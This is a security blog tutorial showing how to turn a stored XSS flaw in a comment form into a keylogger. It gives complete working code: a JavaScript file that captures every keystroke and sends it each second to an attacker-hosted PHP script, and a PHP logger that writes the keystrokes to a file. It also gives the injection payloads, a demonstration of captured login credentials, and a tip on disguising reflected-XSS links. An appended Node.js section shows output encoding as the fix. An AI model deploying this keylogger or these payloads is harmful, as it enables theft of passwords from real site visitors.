Web Security | Web Hacking | Bug Bounty POC | Web Penetration Testing Tools

Saturday, July 16, 2016

Keylogging with Cross-Site Scripting Vulnerability

Today we will discuss keylogging using an XSS vulnerability. First, a word on keylogging: it is a technique in which an attacker records every keystroke the victim types, so the attacker gets to see every key the user pressed. Captured this way, usernames, passwords and other sensitive details can be stolen.

Description:

Keylogging attacks are usually done with keylogger programs, but in this article we will do it through a Cross-Site Scripting vulnerability. With XSS, an attacker can execute arbitrary JavaScript in the victim's browser on the vulnerable site's origin, and with that an attacker can steal a user's session, perform a DoS attack or deface the site. The two main types are Reflected and Stored XSS; keylogging works with both.
For the demo I created some files to show how XSS keylogging works. We need a .js file that records the keystrokes entered on the web page and a .php file that saves the recorded keystrokes to a text file. Here is the source of both.

exploit.js

var keys = '';

// Append every character-producing keystroke on the page to the buffer.
// window.event covers old IE; keyCode/charCode covers the other browsers of the time.
document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    keys += key;
}

// Every second, ship the buffer to exploit.php as a GET parameter on an image
// request, then clear it. encodeURIComponent() is required: a raw '#', '&' or '+'
// in the typed text would otherwise truncate or corrupt the logged value.
window.setInterval(function(){
    new Image().src = 'http://127.0.0.1/demo/1/exploit/exploit.php?keylog=' + encodeURIComponent(keys);
    keys = '';
}, 1000);

In the code above, the new Image().src line inside setInterval sends the buffered keystrokes to exploit.php once a second. The URL is the path to exploit.php, so it has to be changed to wherever the PHP file is hosted; the .js file then delivers the recorded keystrokes to the PHP file, which saves them to a text file. Two things to keep in mind: keypress only fires for keys that produce a character, so Backspace, Tab and the arrow keys are never recorded, and the image request is a plain GET, so the keystrokes also appear in the attacker web server's access log.

exploit.php

<?php

// Append whatever arrived in the keylog parameter to logs.txt. PHP has already
// URL-decoded the value by the time it is in $_GET, so the log holds plain text.
if(!empty($_GET['keylog'])) {
    $logfile = fopen('logs.txt', 'a+');   // append mode; the file is created if missing
    fwrite($logfile, $_GET['keylog']);
    fclose($logfile);
}
?>

The fopen() call opens logs.txt in append mode and fwrite() adds the received keystrokes to the end of it, so earlier entries are never overwritten. That is all the saving work there is.

Now we open a site and test it for XSS. In this article I use a demo page that has a login panel and a comment area; submitted comments are saved to the database and displayed in the "Comments" section. They are printed exactly as they were entered, without any filtering or output encoding, and that is what causes the XSS vulnerability.
So whatever we submit in the Name and Feedback fields is shown under Comments and stored there, reappearing every time the page loads. To check whether the page is vulnerable we first submit a simple probe payload: "><img src=x onerror=prompt(1)>

If the site is vulnerable to XSS, a popup box showing the number 1 appears, as in the image below. The popup means our payload was inserted into the page as HTML and executed, so XSS is possible:

This test proves that the site is vulnerable to XSS, so now we inject the actual exploit. Instead of "><img src=x onerror=prompt(1)> we use a payload that loads our .js file directly: <script src="location of .js"></script>, with the path to exploit.js as the src. Submitting it injects the keylogger into the vulnerable page, and because the comment is stored, the script runs for every visitor who loads the page.
Once the keylogger is injected it records every keystroke entered by anyone on the page. To check, we type some credentials into the login panel, using "Shawar" as both username and password:
As we type the credentials, exploit.js should record the keystrokes and exploit.php should save them to logs.txt. Let's check logs.txt:
In the image above you can clearly see that the credentials were logged to logs.txt. This is how keystrokes are recorded on an XSS-vulnerable site. The method was shown on a Stored XSS site; the same method works with Reflected XSS, except that the victim has to be made to open a crafted URL, so the payload should be encoded so that the malicious code is not obvious in the link. Stored XSS is the better choice because the payload runs for every visitor without any link having to be sent.
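The comment page is vulnerable because it prints the Name and Feedback values straight into the HTML. As an added example (not code from the original post, and not the demo page's PHP), here is that rendering modelled in Node.js alongside the fix the demo lacks: encoding untrusted values for the HTML context before they reach the page. The function names, the data-author attribute and the surrounding template markup are my own assumptions; the two payloads are the ones used above.

```javascript
// Added example, not from the original post. Models the demo page's comment
// rendering in Node.js: the vulnerable version concatenates user input into the
// markup exactly as submitted, the fixed version HTML-encodes it first.
// Function names, the data-author attribute and the template markup are assumptions.

// Encode the five characters that matter inside an HTML element body or a
// double-quoted attribute value (what PHP's htmlspecialchars does with ENT_QUOTES).
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: name and feedback land in the page as typed, so a name containing
// "> closes the attribute and the tag, and everything after it is parsed as new markup.
function renderCommentUnsafe(name, feedback) {
  return '<div class="comment" data-author="' + name + '">' + feedback + '</div>';
}

// Fixed: every untrusted value is encoded for the HTML context it is placed in.
function renderCommentSafe(name, feedback) {
  return '<div class="comment" data-author="' + escapeHtml(name) + '">' +
         escapeHtml(feedback) + '</div>';
}

// Count start/end tags in a fragment. Good enough for this comparison: an encoded
// payload contains no '<' at all, so it can never add a tag.
function countTags(html) {
  return (html.match(/<[a-zA-Z/][^>]*>/g) || []).length;
}

// True if the rendered comment contains more tags than the empty template,
// i.e. the submitted text was interpreted as HTML rather than shown as text.
function introducesMarkup(html) {
  return countTags(html) > countTags(renderCommentSafe('', ''));
}

// The two payloads used in the post.
const probePayload  = '"><img src=x onerror=prompt(1)>';
const scriptPayload = '<script src="http://127.0.0.1/demo/1/exploit/exploit.js"></script>';

// Render each payload through both versions and report whether it became markup.
function demo() {
  const results = {};
  for (const [label, payload] of [['probe', probePayload], ['script', scriptPayload]]) {
    results[label] = {
      unsafe: introducesMarkup(renderCommentUnsafe(payload, payload)),
      safe:   introducesMarkup(renderCommentSafe(payload, payload)),
    };
  }
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderCommentUnsafe(probePayload, 'hello'));
  console.log(renderCommentSafe(probePayload, 'hello'));
  console.log(JSON.stringify(demo(), null, 2));
}
```

Run it with node to see the two renderings side by side: in the unsafe one the img tag and the script tag are live elements, in the safe one they are inert text. In PHP the same fix is htmlspecialchars($value, ENT_QUOTES, 'UTF-8') applied at output time to each value placed into the page. Encoding is context-specific: this covers element bodies and quoted attribute values, while values placed inside a URL, a JavaScript string or an unquoted attribute need their own encoding.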

Demo:

Thanks, Shawar Khan
